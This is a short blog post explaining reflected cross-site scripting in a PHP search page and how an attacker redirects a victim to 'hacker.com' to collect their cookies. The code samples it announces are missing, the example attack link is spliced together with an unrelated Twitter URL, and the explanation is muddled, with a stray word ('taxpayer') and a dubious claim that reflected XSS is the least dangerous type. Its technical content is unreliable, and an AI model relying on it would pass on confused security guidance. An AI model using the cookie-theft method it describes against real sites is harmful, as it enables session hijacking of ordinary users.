In this post, I will explain as shortly what is Reflected Cross-Site Scripting which is also known as XSS, and how the Hackers use this vulnerability to steal all cookies of the website. let's first get started by explaining what is actually XSS, so let get started.
What is Cross-Site Scripting
Cross-Site Scripting (XSS) is one of the most common Web Application vulnerabilities. This allows attackers to execute malicious scripts in the browser. In this article, I will explain to you why the XSS vulnerability occurs. What kinds of attacks can we be exposed to and what should we do to close XSS vulnerabilities?
What is Reflected type XSS:
This type of XSS is a most non-dangerous XSS type, Reflected XSS mostly occurs in a search bar, When the attacker writes the malicious code, the person responsible for this type of vulnerability in the search bar will only see it in their own browser, since the attacker did not encode the special HTML characters in the search bar first. Since the attacker perceives the special HTML characters written by the browser as a code, the taxpayer can write a code to the search value thanks to the non-encoded HTML characters, but since the attack is in a search bar, only the value in the URL is reflected in the User's own Web Browser.
The vulnerable peace of PHP code which is occurring (Reflected) XSS attack:
So as you see above the source code of the vulnerable search function (written with PHP) which is doesn't use any filtering on input for special characters, actually HTML tags, and here is a non-filtered HTML tag's:
and this way the hacker can inject some HTML tags, for example like a "script" tag for writing some Javascript code to redirect the victim into her malicious website, and add the cookies on the request, here is an example Javascript code, which is used for redirect the user/victim to her website and adds all cookies on the request XSS attack:
Javascript code, which is used on XSS attacks to steal all cookies of the victim.
In this case, we talk about the Reflected type XSS, and in our case, this happens on the URL, so the Hacker send the malicious link to the victim, that looks like:
https://twitter.com/aku1337">https://vulnerable.com/search.php?q=
as the result, the victim click's on the link, and the script code works successfully, as a result, the victim redirects to "hacker.com" and adds all the cookies which are stored on the browser, and the cookies stored on some file.
The cookies stored on hacker.com in the hidden pathway:
THE END
In this post, I wrote about the Cross-Site Scripting (XSS) attack, and if this post was helpful for you, please comment below, and also if you want to support me you can send me some coffee's ; D